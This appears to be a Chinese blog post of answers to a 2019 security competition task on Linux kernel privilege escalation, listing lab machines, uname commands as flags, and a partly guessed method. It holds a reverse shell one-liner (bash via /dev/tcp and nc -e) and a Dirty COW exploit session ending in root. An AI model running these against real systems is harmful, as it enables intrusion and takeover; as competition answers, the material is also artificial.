任务1：Linux Kernel提权（50分）[2019年信息安全管理与评估赛题答案 -01]

时间：2019-07-02 19:11:02 阅读：421 评论：0 收藏：0 [点我收藏+]

标签：data mod 版本信息安全系统虚拟机操作提示 alt wss

任务环境说明：

攻击机：

物理机：Windows7

物理机安装工具1：Microsoft Visual Studio 2008

物理机安装工具2：OllyICE

虚拟机1：Ubuntu_Linux

虚拟机1安装工具1：Python3/Python2

虚拟机1安装工具2：GCC

虚拟机1安装工具3：GDB

虚拟机1安装工具4：Netcat

虚拟机1用户名：root，虚拟机1密码：123456

虚拟机操作系统2：CentOS_Linux

虚拟机2安装工具1：GCC

虚拟机2安装工具2：GDB

虚拟机2用户名：root，虚拟机2密码：123456

靶机：

服务器场景1：WindowsServer

服务器场景1的FTP下载服务用户名：anonymous

服务器场景2：LinuxServer_01

任务内容：

1.登录服务器场景2的WebShell，通过相关手段打印当前系统相关信息（内核版本号、硬件架构、主机名称和操作系统类型等，命令并非查看文件），将操作命令作为FLAG值提交；

答案：uname -a

#拿到的webshell后面的题目需要反弹，如果有NC直接nc -e /bin/bash，没有的话也可以直接通过bash反弹命令：bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

2.根据操作命令回显将内核版本信息作为FLAG值提交；

操作命令：uname -r

3.通过相关手段对服务器场景2上传提权文件，将上传成功提示单词全部作为FLAG值提交；

不清楚是什么提权方式，无法作答；

疑似：脏牛、CVE-2017-16995....

脏牛：

www-data@medidor2:/tmp$gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread
www-data@medidor2:/tmp$ ls
hello
www-data@medidor2:/tmp$ chmod +x hello
www-data@medidor2:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@medidor2:/tmp$ ./hello
[*] range: b7573000-b7716000]
[*] getuid = b762bd10
[*] mmap 0xb73cb000
[*] exploiting (patch)
[*] patched (madviseThread)
[*] patched (procselfmemThread)
root@medidor2:/tmp# [*] exploiting (unpatch)
[*] unpatched: uid=33 (madviseThread)
[*] unpatched: uid=33 (procselfmemThread)

root@medidor2:/tmp# id
uid=0(root) gid=0(root) groups=0(root)